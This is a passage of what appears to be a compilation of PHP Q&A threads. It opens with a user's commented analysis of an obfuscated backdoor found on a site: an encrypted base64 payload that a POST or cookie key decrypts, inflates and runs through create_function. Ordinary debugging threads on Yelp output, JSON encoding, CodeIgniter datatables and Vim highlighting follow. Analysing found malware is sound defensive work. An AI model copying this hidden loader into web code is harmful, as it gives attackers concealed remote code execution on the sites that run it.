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
tyv1Lr0=
'));
//$l___l_ = $data
//$l__l_ = $input
//$l____l_ = $i and $func
//If the form was submitted, load from post, otherwise check for a cookie and use that.
$input=isset($_POST['input'])?$_POST['input']:(isset($_COOKIE['input'])?$_COOKIE['input']:NULL);
if($input!==NULL)
{
/*
This is a modified hash function, it looks like the md5 hash with extra characters on the end
I notice (because of the string reverse function in there) that when the input string is a palindrome
the extra characters on the end of the output string match the beginning of the output string e.g.
input string = '12321'
md5 = 8542516f8870173d7d1daba1daaaf0a1
modified md5 = 8542516f8870173d7d1daba1daaaf0a185425
The end of the modified md5 (85425) matches the beginning. Don't know how relevant that is.
*/
$input = md5($input).substr(md5(strrev($input)), 0, strlen($input));
//Note 15185 is the length of the data string above after base64 decoding.
for($i = 0; $i < 15185; $i++)
{
//Take the ascii # of the data char at each position and subtract the ascii # of the char
//at the same position in the hashed input. Loop over 256 and return as a char
$data[$i]=chr(( ord($data[$i])-ord($input[$i]))%256);
//Then add that char to the end of the hashed input string
$input.=$data[$i];
}
//$data has been modified at this point, if gzip suceeds in decompressing it
if($data=#gzinflate($data))
{
//If we made a post save it in a cookie
if(isset($_POST['input']))#setcookie('input', $_POST['input']);
//create a function from the unzipped data, unset used variables, and run the function.
$func=create_function('',$data);
unset($data,$input);
$func();
}
}?>
<form action="" method="post"><input type="text" name="input" value=""/><input type="submit" value=">"/></form>
So to summarize it looks like it takes your input, runs it through some md5 shenanigans, combines it with the de-base64'd block of data, unzips it, turns the result into a function, and runs it.
My question is why? Why not just take a text input and eval() it? What is this extra code giving the hacker that he couldn't do before? And is there any way I can see what's in the block of code? It looks like the input can't be plain php, but rather a string of gobbledegook that fits together with the data to create a valid zip file.

This code obfuscation is mainly done to hide the real activity from any researcher. Also, some tools can discover the malicious code if it's not obfuscated. To discover what's hidden behind the scenery, you could have dumped the $data var just before create_function was called. But you can't do that without knowing the incoming data from the hacker's input. If you really want to know, what's there, you can set up logging for the input data and wait until the hacker comes to the site.

How do I validate a PHP integer within a variable?

I have integrated Yelp reviews into my directory site with each venue that has a Yelp ID returning the number of reviews and overall score.
Following a successful MySQL query for all venue details, I output the results of the database formatted for the user. The Yelp element is:
while ($searchresults = mysql_fetch_array($sql_result)) {
if ($yelpID = $searchresults['yelpID']) {
require('yelp.php');
if ( $numreviews > 0 ) {
$yelp = '<img src="'.$ratingimg.'" border="0" /> Read '.$numreviews.' reviews on <img src="graphics/yelp_logo_50x25.png" border="0" /><br />';
} else {
$yelp = '';
}
} //END if ($yelpID = $searchresults['yelpID']) {
} //END while ($searchresults = mysql_fetch_array($sql_result)) {
The yelp.php file returns:
$yrating = $result->rating;
$numreviews = $result->review_count;
$ratingimg = $result->rating_img_url;
$url = $result->url;
If a venue has a Yelp ID and one or more reviews then the output displays correctly, but if the venue has no Yelp ID or zero reviews then it displays the Yelp review number of the previous venue.
I've checked the $numreviews variable type and it's an integer.
So far I've tried multiple variations of the "if ( $numreviews > 0 )" statement such as testing it against >=1, !$numreviews etc., also converting the integer to a string and comparing it against other strings.
There are no errors and printing all of the variables returned gives the correct number of reviews for each property with venues having no ID or no reviews returning nothing (as opposed to zero). I've also compared it directly against $result->review_count with the same problem.
Is there a better way to make the comparison or better format of variable to work with to get the correct result?
EDIT:
The statement if ($yelpID = $searchresults['yelpID']) { is not operating as it should. It is identical to other statements in the file, validating row contents which work correctly for their given variable, e.g. $fbID = $searchresults['fbID'] etc.
When I changed require('yelp.php'); to require_once('yelp.php'); all of the venue outputs changed to showing only the first iterated result. Looking through the venues outputted, the error occurs on the first venue after a successful result which makes me think there is a pervasive piece of code in the yelp.php file, causing if ($yelpID = $searchresults['yelpID']) { to be ignored until a positive result is found (a yelpID in the db), i.e. each venue is correctly displayed with a yelp number of reviews until a blank venue is encountered. The preceding venues' number of reviews is then displayed and this continues for each blank venue until a venue is found with a yelpID when it shows the correct number again. The error reoccurs on the next venue output with no yelpID and so on.
Sample erroneous output: (line 1 is var_dump)
string(23) "bayview-hotel-bushmills"
Bayview Hotel
Read 3 reviews on yelp
Benedicts
Read 3 reviews on yelp (note no var_dump output, this link contains the url for the Bayview Hotel entry above)
string(31) "bushmills-inn-hotel-bushmills-2"
Bushmills Inn Hotel
Read 7 reviews on yelp
I suspect this would be a new question rather than clutter/confuse this one further?
END OF EDIT
Note: I'm aware of the need to upgrade to mysqli but I have thousands of lines of legacy code to update. For now I'm working on functionality before reviewing the code for best practice.

Since the yelp.php is sort of a blackbox; the best explanation for this behavior would be that it only set's those variables if it finds a match. Updating your code to this should fix that:
unset($yrating, $numreviews, $ratingimg, $url);
require('yelp.php');
I also noticed this peculiar if-statement, do you realize that's an assignment or is this a copy/paste error? If you want to test (that's what if is for)
if ($yelpID == $searchresults['yelpID']) {

Unable to get stat gathering to work

Using PHP to gather stats from multiple files. Goal is to take the entire first row of data, which is the column name, then take the entire row of data from the row where the first column matches the name specified in the code. These two rows should then be linked to each other, so they can be displayed in a dynamic image.
However, to avoid excessive requests from the external data source, the data is only downloaded once a day by saving it into a json file. The previous day's data is also kept, to perform a difference calculation.
What I'm stuck on is...well, it's not working as intended. The dynamic image does not display and says it cannot be displayed because it contains errors, and the files aren't being created properly. Without any files existing, only the 'old' data file is being created, and the gathered data is saved there in a format that I didn't expect.
Here's the entire PHP code:
<?php
header("Content-Type:image/png");
$root=realpath($_SERVER['DOCUMENT_ROOT']);
function saveTeamData(){
$urls=array('http://www.dc-vault.com/stats/bio.txt','http://www.dc-vault.com/stats/math.txt','http://www.dc-vault.com/stats/misc.txt','http://www.dc-vault.com/stats/overall.txt','http://www.dc-vault.com/stats/phys.txt');
$fullJson=array();
function stats($url){
$json=array();
$team=array("teamName");
$file=fopen($url,'r');
$firstRow=fgetcsv($file,0,"\t");
while($data=fgetcsv($file,0,"\t")){
if(in_array($data[0],$team)){
foreach($firstRow as $indx=>$colName){
if((strpos($colName,'Position')!=0)||(strpos($colName,'Score')!=0)||(strpos($colName,'Team')!=0)){
if(strrpos($colName,'Position')!==false){
$colName=substr($colName,0,strpos($colName,' Position'));
$colName=$colName."Pos";
}else{
$colName=substr($colName,0,strpos($colName,' Score'));
$colName=$colName."Score";
}
$colName=str_replace(' ',',',$colName);
$teamData[$colName]=$data[$indx];
}
}
$json=$teamData;
}
}
fclose($file);
return $json;
}
foreach($urls as $item){
$fullJson=array_merge($fullJson,stats($item));
}
$final_json['teamName']=$fullJson;
$final_json['date']=date("Y-m-d G:i:s",strtotime("11:00"));
$final_json=json_encode($final_json);
file_put_contents("$root/scripts/vaultData.js",$final_json);
return $final_json;
}
if(!file_exists("$root/scripts/vaultData.js")){
$teamData=saveTeamData();
}else{
$teamData=json_decode(file_get_contents("$root/scripts/vaultData.js"));
}
$lastDate=$teamData->date;
$now=date("Y-m-d G:i:s");
$hours=(strtotime($now)-strtotime($lastDate))/3600;
if($hours>=24||!file_exists("$root/scripts/vaultDataOld.js")){
file_put_contents("$root/scripts/vaultDataOld.js",json_encode($teamData));
$teamData=saveTeamData();
}
$team=$teamData->{"teamName"};
$teamOld=json_decode(file_get_contents("$root/scripts/vaultDataOld.js"))->{"teamName"};
$template=imagecreatefrompng("$root/images/vaultInfo.png");
$black=imagecolorallocate($template,0,0,0);
$font='images/fonts/UbuntuMono-R.ttf';
$projects=array();
$subsections=array();
foreach($team as $key=>$val){
$projectName=preg_match("/^(.*)(?:Pos|Score)$/",$key,$cap);
$projectName=str_replace(","," ",$cap[1]);
if(preg_match("/Pos/",$key)){
$$key=(strlen($val)>10?substr($val,0,10):$val);
$delta=$key."Delta";
$$delta=($val - $teamOld->{$key});
$$delta=(strlen($$delta)>5?substr($$delta,0,5):$$delta);
if($projectName!=="Overall"){
if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){
$projects[$projectName]["position"]=$$key;
$projects[$projectName]["position delta"]=$$delta*1;
}else{
$subsections[$projectName]["position"]=$$key;
$subsections[$projectName]["position delta"]=$$delta*1;
}
}
}elseif(preg_match("/Score/",$key)){
$$key=(strlen($val)>10?substr($val,0,10):$val);
$delta=$key."Delta";
$$delta=($val - $teamOld->{$key});
$$delta=(strlen($$delta)>9?substr($$delta,0,9):$$delta);
if($projectName!=="Overall"){
if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){
$projects[$projectName]["score"]=$$key;
$projects[$projectName]["score delta"]=$$delta;
}else{
$subsections[$projectName]["score"]=$$key;
$subsections[$projectName]["score delta"]=$$delta;
}
}
}
}
$sort=array();
foreach($projects as $key=>$row){
$sort[$key]=$row["score"];
}
array_multisort($sort,SORT_DESC,$projects);
$lastupdated=round($hours,2).' hours ago';
$y=35;
foreach($projects as $name=>$project){
imagettftext($template,10,0,5,$y,$black,$font,$name);
imagettftext($template,10,0,149,$y,$black,$font,$project['position']);
imagettftext($template,10,0,216,$y,$black,$font,$project['position delta']*-1);
imagettftext($template,10,0,257,$y,$black,$font,$project['score']);
imagettftext($template,10,0,331,$y,$black,$font,$project['score delta']);
$y+=20;
}
$y=655;
foreach($subsections as $name=>$subsection){
imagettftext($template,10,0,5,$y,$black,$font,$name);
imagettftext($template,10,0,149,$y,$black,$font,$subsection['position']);
imagettftext($template,10,0,216,$y,$black,$font,$subsection['position delta']*-1);
imagettftext($template,10,0,257,$y,$black,$font,$subsection['score']);
imagettftext($template,10,0,331,$y,$black,$font,$subsection['score delta']);
$y+=20;
}
imagettftext($template,10,0,149,735,$black,$font,$team->{'OverallPos'});
imagettftext($template,10,0,216,735,$black,$font,$OverallPosDelta*-1);
imagettftext($template,10,0,257,735,$black,$font,$OverallScore);
imagettftext($template,10,0,331,735,$black,$font,$OverallScoreDelta);
imagettftext($template,10,0,149,755,$black,$font,$lastupdated);
imagepng($template);
?>
And here is what the data looks like when it is saved:
"{\"teamName\":{\"Folding#HomePos\":\"51\",\"Folding#HomeScore\":\"9994.405407\"},\"date\":\"2014-03-14 11:00:00\"}"
I've omitted most of the data because it just makes things excessively long, and it helps to see the format. Now the reason why its an unexpected output is because I didn't expect trailing slashes to be in it. The older version of this code would output like this:
{"teamName":{"Asteroids#HomePos":"192","Asteroids#HomeScore":"7647.783251"},"date":"2014-03-14 11:00:00"}
So the expected behaviour is to to gather the data from the aforementioned rows in each tab delimited text file, copy the old data into the 'old' data file (vaultDataold), save the new data into the 'current' data file (vaultData), and then display the data from the 'current' file in a dynamic image, along with performing a 'new' minus 'old' calculation on the two files to show the change since the previous day.
Most of this code should work, as I've had it working before in a different way. The issue likely lies somewhere with gathering the row data and saving it, most probably the latter. I'm guessing the slashes are causing the issue.

Turns out that the cause was twofold. Firstly, in my function, I was JSON encoding something that had already been encoded, so when the second file was saved, it appeared as shown in my question. To fix that, I did this:
$final_json['date']=date("Y-m-d G:i:s",strtotime("11:00"));
$encode_json=json_encode($final_json);
file_put_contents("$root/scripts/vaultData.js",$encode_json);
return $final_json;
In addition, as pointed out by another in the comments, I had to add $root to my function, and again within it.

String comparison fails because of value passed by datatable, codeigniter

I am facing a really strange problem which i am debugging from past 2 hours but unable to find the solution. Before explaining the problem, let me show the code
My Controller Function is
$this->load->library('datatables');
$actionLinkBar = $this->load->view("content/updates/dt_files/action_bar", array(), TRUE);
$this->datatables
->select("id, name, status")
->where('id', $this->session_data['user_id'])
->from("t_user")
->add_column("action", $actionLinkBar, 'id, name, status');
echo $this->datatables->generate();
And the code in my action_bar view is
<?php
$status_rec = '$3';
var_dump($status_rec); // STRANGE OUTPUT - string(2) "1"
?>
<div class="action_bar" data-update-id="<?php echo '$1'; ?>">
<?php if ($status_rec == '1') { ?> // HENCE COMPARISON ALWAYS FAILS
<span>Present</span>
<?php }else { ?>
<span>Absent</span>
<?php } ?>
</div>
Now explaining the problem.. I am using Datatables with Codeigniter. I have a view template action_bar which will be displayed in one of the columns of datable in front end. The view has if/else condition based on value of status field from DB. If status feild value = 1 = Present. Else it is Absent. But though the $status_rec has value as '1' it still fails in comparison. Strange thing is on var_dumping $status_rec, i found that though it has proper value, the length is weird(2) though its single int. I even tried trimming etc but still no effect. Maybe that's why the comparison is failing. Your help is really needed :/
P.S - The DB feild that holds this value is int with length 1

I also had a similar problem solved it a bit by changing the library:
Datatables.php with if condition
changes in the 194, 196 and 440 strings
How to use:
$if = array('0' => array('if_condition'=>'$3', 'if_condition_eqv'=>'1', 'if_true'=>'<span>Present</span></div>', 'if_false'=>'<span>Absent</span></div>'));
$this->datatables->add_column("action", '<div class="action_bar" data-update-id="$1">', 'id, name, status');
BUT you have to change: ".=" On "=" (strings 497 and 504)
Should work.
I would really appreciate if someone will correct code
P.S. Sorry for my english

How can I change my Vim vimrc to know when I am typing a PHP variable and match the color?

When using Vim the way my color syntax is now, when I type in $ it shows yellow and when I write text it comes in white. How can I configure my vimrc to know when I am writing a PHP variable ($variable) and keep the color consistent between the $ and the words after it (variable in my example)? It is just a nuisance thing, but I hate seeing variable names with non-matching color, it drives me nuts.

You might want to consider getting this to fix your problem: http://www.vim.org/scripts/script.php?script_id=1571

There is another method for you ,if you want to display some custom color for some Class,methods, etc.
First of all, download the php.vim.
then, run the Highlight test in Gvim, you will get some keywords like this:
htmlTagN htmlTagN
htmlBoldUnderline htmlBoldUnderline htmlUnderlineBold
htmlBoldItalic htmlBoldItalic htmlItalicBold
htmlBold htmlBold
htmlBoldUnderlineItalic htmlBoldUnderlineItalic htmlBoldItalicUnderline htmlUnderlineBoldItalic htmlUnderlineItalicBold htmlItalicBoldUnderline htmlItalicUnderlineBold
htmlUnderlineItalic htmlUnderlineItalic htmlItalicUnderline
htmlUnderline htmlUnderline
htmlItalic htmlItalic
cssStyle cssStyle
javaScriptCommentSkip javaScriptCommentSkip
javaScriptParens javaScriptParens
javaScriptValue javaScriptValue javaScriptNumber
cssDefinition cssDefinition
cssAttributeSelector cssAttributeSelector
cssMediaBlock cssMediaBlock
cssFontDescriptorBlock cssFontDescriptorBlock
cssPseudoClass cssPseudoClass
cssSpecialCharQQ cssSpecialCharQQ
cssSpecialCharQ cssSpecialCharQ
cssLength cssLength
cssString cssString
phpRegion phpRegion
phpRegionAsp phpRegionAsp
phpRegionSc phpRegionSc
phpIdentifierComplex phpIdentifierComplex
phpMethodsVar phpMethodsVar
phpLabel phpLabel
phpFoldTry phpFoldTry
phpFoldCatch phpFoldCatch
NONE NONE
phpStructureHere phpStructureHere
phpMemberHere phpMemberHere
phpMethodHere phpMethodHere
phpPropertyHere phpPropertyHere
phpTernaryRegion phpTernaryRegion
phpHereDoc phpHereDoc
phpSpecialCharfold phpSpecialCharfold
phpPropertyInString phpPropertyInString
phpIdentifierInString phpIdentifierInString
phpIdentifierInStringComplex phpIdentifierInStringComplex
phpIdentifierInStringErratic phpIdentifierInStringErratic
phpErraticBracketRegion phpErraticBracketRegion
phpStaticUsage phpStaticUsage
phpStaticAccess phpStaticAccess
phpStaticVariable phpStaticVariable
phpStaticCall phpStaticCall
phpForeachRegion phpForeachRegion
phpForRegion phpForRegion
phpConstructRegion phpConstructRegion
phpSwitchConstructRegion phpSwitchConstructRegion
phpDoBlock phpDoBlock
phpSwitchBlock phpSwitchBlock
phpDoWhileConstructRegion phpDoWhileConstructRegion
phpStatementRegion phpStatementRegion
phpCaseRegion phpCaseRegion
phpArrayRegion phpArrayRegion
phpArrayRegionSimple phpArrayRegionSimple
phpArrayComma phpArrayComma phpListComma phpPREGArrayComma
phpListRegion phpListRegion
phpBlockRegion phpBlockRegion
phpParentRegion phpParentRegion
phpBracketRegion phpBracketRegion
phpFoldFunction phpFoldFunction
phpFoldClass phpFoldClass
phpFoldInterface phpFoldInterface
htmlRegion htmlRegion
phpDefineClassName phpDefineClassName
phpDefineClassImplementsName phpDefineClassImplementsName
phpDefineClassImplementsComma phpDefineClassImplementsComma
phpDefineClassImplementsCommentOneLine phpDefineClassImplementsCommentOneLine
phpClassBlock phpClassBlock
phpDefineClassBlockCommentOneline phpDefineClassBlockCommentOneline
phpDefineInterfaceName phpDefineInterfaceName
phpDefineFuncName phpDefineFuncName
phpDefineFuncProto phpDefineFuncProto
phpProtoArray phpProtoArray
phpDefineFuncBlockCommentOneline phpDefineFuncBlockCommentOneline
phpFuncBlock phpFuncBlock
phpDefineMethodName phpDefineMethodName
phpTryBlock phpTryBlock
phpCatchRegion phpCatchRegion
phpCatchBlock phpCatchBlock
phpFoldHtmlInside phpFoldHtmlInside
phpEchoRegion phpEchoRegion
phpClassStart phpClassStart
phpSyncStartOfFile phpSyncStartOfFile
phpSyncComment phpSyncComment
phpSyncString phpSyncString
phpRegionSync phpRegionSync
pregConcat pregConcat
pregClassEscapeMainQuote pregClassEscapeMainQuote
pregClassEscapeDouble2 pregClassEscapeDouble2
pregEscapeMainQuote pregEscapeMainQuote
phpPREGRegion phpPREGRegion
phpPREGOpenParentMulti phpPREGOpenParentMulti
phpPREGRegionMulti phpPREGRegionMulti
phpPREGStringStarter phpPREGStringStarter
phpPREGArrayRegion phpPREGArrayRegion
phpPREGArrayOpenParent phpPREGArrayOpenParent
pregNonSpecialEscape pregNonSpecialEscape
,here it is, your can modify the keywords for your php file, add some configure in your vimrc like this:
hi TabLine guifg=#1C1D1F guibg=#BFBFBF gui=NONE
the 'TabLine' can replace by the keywords. guifg is the fore-color, guibg is the background color,gui is the terminal color. you can configure it by yourself.

I believe what you're looking for is:
hi link phpIdentifier phpVarSelector
You can simply add this to your ~/.vimrc file or you can create a php-specific "after" syntax file and add it there:
~/.vim/after/syntax/php.vim
Create the directories if they do not already exist.
For future highlighting changes you can use this mapping to figure out what the syntax group is under the cursor.

With this function in your .vimrc you can hit ctrl+p to show the syntactic group of the word/character under the cursor:
function! <SID>SynStack()
if !exists("*synstack")
return
endif
echo map(synstack(line('.'), col('.')), 'synIDattr(v:val, "name")')
endfunc
nnoremap <C-p> :call <SID>SynStack()<CR>
With this sample PHP code:
$var_name = false;
if the cursor is on the $ I get:
['phpRegion', 'phpIdentifier', 'phpVarSelector']
else, if the cursor is on the n of name , I get:
['phpRegion', 'phpIdentifier']
